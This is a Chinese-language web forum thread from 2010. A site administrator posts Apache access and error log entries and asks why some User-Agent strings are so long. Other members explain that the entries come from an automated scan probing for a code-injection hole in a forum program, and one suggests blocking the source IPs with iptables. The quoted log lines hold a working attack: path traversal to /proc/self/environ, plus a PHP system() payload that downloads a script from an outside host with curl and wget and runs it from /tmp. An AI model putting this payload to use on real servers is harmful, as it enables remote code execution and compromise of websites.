作者 主題: access.log中奇怪的 User-Agent => <?php system('curl ....  (閱讀 3262 次)

0 會員 與 1 訪客 正在閱讀本文。

Aeolus

  • 懷疑的國中生
  • **
  • 文章數: 36
  • 性別: 男
  • Aeolus
    • 檢視個人資料
怪怪的user agent
引用
188.40.87.9 - - [28/May/2010:14:03:22 +0800] "GET /forum/index.php?/topic/3152-%E8%87%AA%E5%8B%95%E8%BD%89%E5%9D%80indexphp//mod.php?mod=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 77980 "-" "<?php system('curl -O /tmp/injektor.txt http://www.sosmicroparis.fr//components/com_artforms/assets/captcha/includes/captchatalk/robots.txt;wget -o /tmp/injektor.txt http://www.sosmicroparis.fr//components/com_artforms/assets/captcha/includes/captchatalk/robots.txt;php /tmp/injektor.txt'); ?>"

188.40.87.9 - - [28/May/2010:14:03:25 +0800] "GET //mod.php?mod=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 261 "-" "<?php system('curl -O /tmp/injektor.txt http://www.sosmicroparis.fr//components/com_artforms/assets/captcha/includes/captchatalk/robots.txt;wget -o /tmp/injektor.txt http://www.sosmicroparis.fr//components/com_artforms/assets/captcha/includes/captchatalk/robots.txt;php /tmp/injektor.txt'); ?>"

217.16.18.219 - - [01/Jun/2010:17:29:52 +0800] "GET /forum/index.php?/topic/3477-ipb-221%E7%99%BC%E4%BD%88%E6%9B%B4%E6%96%B0//lib/Loggix/Module/Calendar.php?pathToIndex=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 103121 "-" "<?php system('curl -O /tmp/injektor.txt http://www.sosmicroparis.fr//components/com_artforms/assets/captcha/includes/captchatalk/robots.txt;wget -o /tmp/injektor.txt http://www.sosmicroparis.fr//components/com_artforms/assets/captcha/includes/captchatalk/robots.txt;php /tmp/injektor.txt'); ?>"

217.16.18.219 - - [01/Jun/2010:17:29:55 +0800] "GET //lib/Loggix/Module/Calendar.php?pathToIndex=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 284 "-" "<?php system('curl -O /tmp/injektor.txt http://www.sosmicroparis.fr//components/com_artforms/assets/captcha/includes/captchatalk/robots.txt;wget -o /tmp/injektor.txt http://www.sosmicroparis.fr//components/com_artforms/assets/captcha/includes/captchatalk/robots.txt;php /tmp/injektor.txt'); ?>"

217.16.18.219 - - [01/Jun/2010:17:50:13 +0800] "GET /forum/index.php?app=calendar&amp;module=calendar&amp;cal_id=2&amp;do=newevent&amp;formtype=range/lib/Loggix/Module/Calendar.php?pathToIndex=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 35761 "-" "<?php system('curl -O /tmp/injektor.txt http://www.sosmicroparis.fr//components/com_artforms/assets/captcha/includes/captchatalk/robots.txt;wget -o /tmp/injektor.txt http://www.sosmicroparis.fr//components/com_artforms/assets/captcha/includes/captchatalk/robots.txt;php /tmp/injektor.txt'); ?>"

正常的user agent
引用
OOO.OOO.OOO.OOO - - [05/May/2010:07:37:38 +0800] "GET /forum/index.php?/topic/10231-%e4%b8%ad%e6%96%87%e5%ae%89%e8%a3%9d%e5%95%8f%e9%a1%8c/page__pid__12656__st__0 HTTP/1.1" 200 23641 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )"

OOO.OOO.OOO.OOO - - [05/May/2010:15:30:07 +0800] "GET /forum/index.php?/topic/8438-%e7%b6%93%e7%94%b1%e7%b6%b2%e7%ab%99%e5%85%b6%e5%ae%83%e4%b8%bb%e9%a0%81%e4%be%86%e7%99%bb%e5%85%a5%e8%ab%96%e5%a3%87/page__view__findpost__p__10824 HTTP/1.1" 302 20 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )"


一般User-Agent不是只是簡單幾個字嗎? 它爲何寫這樣長,有特殊意義嗎?
rewrite mod來判斷時,會不會造成傷害?

Thanks.

micmic3

  • 俺是博士!
  • *****
  • 文章數: 1692
    • 檢視個人資料
這應該是一種 hack 的方法

anderson1127

  • 訪客
樓主要不要順道去看看Error.log ?? access.log常常要與Error.log互相搭配來看才對啊....

Aeolus

  • 懷疑的國中生
  • **
  • 文章數: 36
  • 性別: 男
  • Aeolus
    • 檢視個人資料
謝謝指導

error.log

對應188.40.87.9只有一筆
引用
[Fri May 28 14:03:25 2010] [error] [client 188.40.87.9] script '/var/www/mod.php' not found or unable to stat

對應217.16.18.219有三筆
引用
[Tue Jun 01 17:29:55 2010] [error] [client 217.16.18.219] File does not exist: /var/www/lib
[Tue Jun 01 17:50:15 2010] [error] [client 217.16.18.219] File does not exist: /var/www/lib
[Tue Jun 01 17:50:16 2010] [error] [client 217.16.18.219] File does not exist: /var/www/forum/lib

看起來只是try /www/ 底下的資料而已?

還是有其它可能?

Thanks.

Darkhero

  • 酷!學園 學長們
  • 俺是博士!
  • *****
  • 文章數: 3728
  • 性別: 男
    • 檢視個人資料
    • ㄚ凱隨手紀
簡單的說..那是在try看看有沒有裝某個論壇程式, 然後那個程式有程式碼注入攻擊的漏洞...

要是有裝那個論壇程式..且在對應的目錄且版本又符合有漏洞的版本..就中獎了...

而根據那個時間跟打法來看..應該不是機器人就是 script 去掃的...
算是一種亂槍打鳥的方式..或是搭配 google search 出來的結果去找看看有沒有運氣好可以打到...
« 上次編輯: 2010-07-12 19:05 由 Darkhero »
希望我們的討論是為了把問題解決,而不是爭論誰對誰錯.
『灌水才是重點,發文只是順便』
『我寧可讓不會釣魚的工程師餓死,也不想讓會餓死的工程師去攪沉公司....』
Blog: http://blog.darkhero.net/
秘密基地: http://www.darkhero.net/comic/
目前服務的網站: http://www.libook.com.tw/

Aeolus

  • 懷疑的國中生
  • **
  • 文章數: 36
  • 性別: 男
  • Aeolus
    • 檢視個人資料
謝謝回覆.
如果這樣的USER-AGENT對rewrite mod沒傷害,那應該可放心.

Darkhero

  • 酷!學園 學長們
  • 俺是博士!
  • *****
  • 文章數: 3728
  • 性別: 男
    • 檢視個人資料
    • ㄚ凱隨手紀
有沒有傷害我不知道, 因為那是你的機器...

不過通常我看到這樣的 log, 或是用分析的工具發現有這樣的存取, 就會直接先用 iptables -j DROP 先把他擋掉一陣子...
避免這些連線進來到 apache ...
希望我們的討論是為了把問題解決,而不是爭論誰對誰錯.
『灌水才是重點,發文只是順便』
『我寧可讓不會釣魚的工程師餓死,也不想讓會餓死的工程師去攪沉公司....』
Blog: http://blog.darkhero.net/
秘密基地: http://www.darkhero.net/comic/
目前服務的網站: http://www.libook.com.tw/